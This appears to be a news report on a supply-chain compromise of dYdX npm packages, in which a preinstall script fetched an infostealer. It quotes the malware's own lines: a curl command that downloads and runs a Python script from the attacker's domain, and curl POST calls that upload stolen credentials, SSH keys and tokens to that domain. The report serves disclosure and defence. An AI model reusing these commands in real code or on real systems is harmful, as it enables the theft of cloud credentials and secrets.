Multiple npm packages published by the crypto exchange, dYdX, and used by at least 44 cryptocurrency projects appear to have been compromised.
Powered by the Ethereum blockchain, dYdX is a decentralized exchange platform offering perpetual trading options for over 35 popular cryptocurrencies, including Bitcoin (BTC) and Ether (ETH). At the time of writing, we observed the platform’s average daily trading volume approaching $1 billion.
The packages in question were published from the npm account of a dYdX staff member and were found to contain malicious code that runs an information stealer on any system where they are installed.
npm packages used by crypto exchange compromised
Security researcher Maciej Mensfeld of software supply chain security firm Mend and creator of Diffend.io, reported coming across multiple npm packages that were compromised and covertly installing infostealers.
The packages in question, shown below, appear to have been published from the npm account of a dYdX crypto platform employee, BleepingComputer observed, although the cause of this compromise is yet to be confirmed:
@dydxprotocol/solo – versions 0.41.1, 0.41.2
@dydxprotocol/perpetual – versions 1.2.2, 1.2.3
An earlier advisory claimed that the package ‘@dydxprotocol/node-service-base-dev’ was also affected but it has since been withdrawn.
BleepingComputer observed that the compromised version 0.41.1 of the ‘solo’ package was still live on npm at the time of writing:
These packages make up the “Ethereum Smart Contracts and TypeScript library used for the dYdX Solo Trading Protocol.”
The solo package, for example, is used by at least 44 GitHub repositories belonging to multiple crypto platforms. Both the ‘solo’ and ‘perpetual’ packages on GitHub state these are being “currently used by trade.dydx.exchange.”
Fake ‘Circle’ CDN domain used to steal AWS IAM creds, SSH keys, GitHub tokens
Mensfeld shared the malicious code that had been injected into the manifest file of the ‘solo’ package.
As soon as the ‘solo’ package is installed, a preinstall script runs, downloading and executing the contents of a ci.js JavaScript file hosted on api.circle-cdn.com.
Public domain records seen by BleepingComputer state “circle-cdn.com” was registered quite recently—on September 14th.
The domain name and the use of ‘ci.js’ in the malicious file name are likely attempts by the threat actor to imitate CircleCI, a software development CI/CD (continuous integration and continuous delivery) platform. By contrast, CircleCI’s official API is hosted by Cloudflare and reachable on circleci.com/api/v2/pipeline.
“Looking at the diff here… a preinstall was added,” Mensfeld wrote in a GitHub issue alerting the dYdX community after having no luck reaching the platform.
“But this script contains a code that looks malicious…. It seems to be stealing credentials and other secrets,” explained the researcher.
BleepingComputer observed that the ci.js script pulled by the compromised versions, as shown below, downloads and runs yet another script, a Python file named setup.py:
curl http://api.circle-cdn.com/setup.py --output cisetup.py >> /dev/null 2>&1 && python3 cisetup.py && rm cisetup.py
It is this ‘setup.py’ that contains the info-stealing code, which exfiltrates the IAM credentials from the victim’s AWS instance, among other secrets.
The 169.254.x.x IP address shown below, to which the malicious code connects, is a product of Automatic Private IP Addressing (APIPA), a mechanism invoked when a computer configured to obtain an IP address automatically via DHCP is unable to reach a DHCP server.
Documentation published by AWS also shows how this address is relevant in the wider IAM context.
Additionally, the code steals the user’s GitHub tokens, SSH keys and environment variables, as well as the system’s external IP address.
The stolen data is then uploaded to the same api.circle-cdn.com domain:
subprocess.getoutput("curl -X POST http://api.circle-cdn.com/uploader.php -F 'uploaded_file=@" + filename2 + "' -F 'submit=Upload'")
subprocess.getoutput('curl -X POST http://api.circle-cdn.com/api.php -d "textdata=' + allen + '"')
BleepingComputer observed that the malicious code is nearly identical to that seen in the past in the malicious ‘PyGrata’ Python packages, which also stole the victim’s AWS credentials, environment variables, and SSH keys.
dYdX chief architect Brendan Chou thanked Mensfeld for promptly reporting the compromise and confirmed that “all [compromised versions] have been taken down except solo@0.41.1,” attributing this to what appears to be “a temporary oversight” on npm’s part.
BleepingComputer has reached out to dYdX via email and Twitter prior to publishing, to better understand the impact and scope of this compromise and we’ll update this report as we hear back.
This incident follows last year’s hijack of the popular npm libraries ‘ua-parser-js,’ ‘coa’ and ‘rc,’ which had been laced with crypto miners and password stealers. That hijack came just weeks after PyPI packages were hijacked as the result of a phishing campaign targeting developers.
Software supply chain threats like these have recently prompted leading open source registries such as npm and PyPI to mandate two-factor authentication for maintainers of the most widely used libraries.